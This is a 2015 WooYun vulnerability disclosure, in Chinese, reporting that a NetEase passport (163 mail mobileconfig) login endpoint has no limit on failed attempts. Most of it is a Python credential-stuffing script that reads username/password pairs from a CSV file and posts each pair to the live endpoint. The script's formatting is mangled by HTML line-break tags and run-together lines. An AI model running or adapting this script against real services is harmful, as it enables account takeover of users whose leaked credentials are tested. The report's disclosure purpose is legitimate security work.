网易通行证的一个无限撞库点有案例

发表于 2015年07月04日
WooYun漏洞库

漏洞概要

缺陷编号：WooYun-2015-0124461

漏洞标题：网易通行证的一个无限撞库点有案例

漏洞详情

披露状态：

2015-07-04: 细节已通知厂商并且等待厂商处理中
2015-07-07: 厂商已经确认，细节仅向厂商公开
2015-07-17: 细节向核心白帽子及相关领域专家公开
2015-07-27: 细节向普通白帽子公开
2015-08-06: 细节向实习白帽子公开
2015-08-21: 细节向公众公开

简要描述：

无意间发现的一个无限撞库点

详细说明：

https://ssl.mail.163.com/config/mobileconfig/index

在这里输入用户名和密码，错误多少次都是没有限制的。那么我们抓个包写个脚本实践下。

# encoding=utf-8<br>
import re<br>
import json<br>
import requestsdef parse_csv(filename):<br>
    with open(filename, 'r') as fp:<br>
        cr = re.compile(r'"(.*)","(.*)"')<br>
        result = cr.findall(fp.read())<br>
        return resultdef do_request():<br>
    accounts = parse_csv('126.csv')s = requests.Session()for account in accounts:<br>
        params = {<br>
            'uid': account[0].lower(),<br>
            'password': account[1],<br>
            'mobile': '',<br>
            'cal': 'false',<br>
            'card': 'false',<br>
            'basepath': 'https://ssl.mail.163.com/config/',<br>
            'code': ''<br>
        }<br>
        resp = s.post('https://ssl.mail.163.com/config/mobileconfig/doconfig?m=url', data=params)<br>
        result = json.loads(resp.content)<br>
        print resp.content, accountif __name__ == '__main__':<br>
    do_request()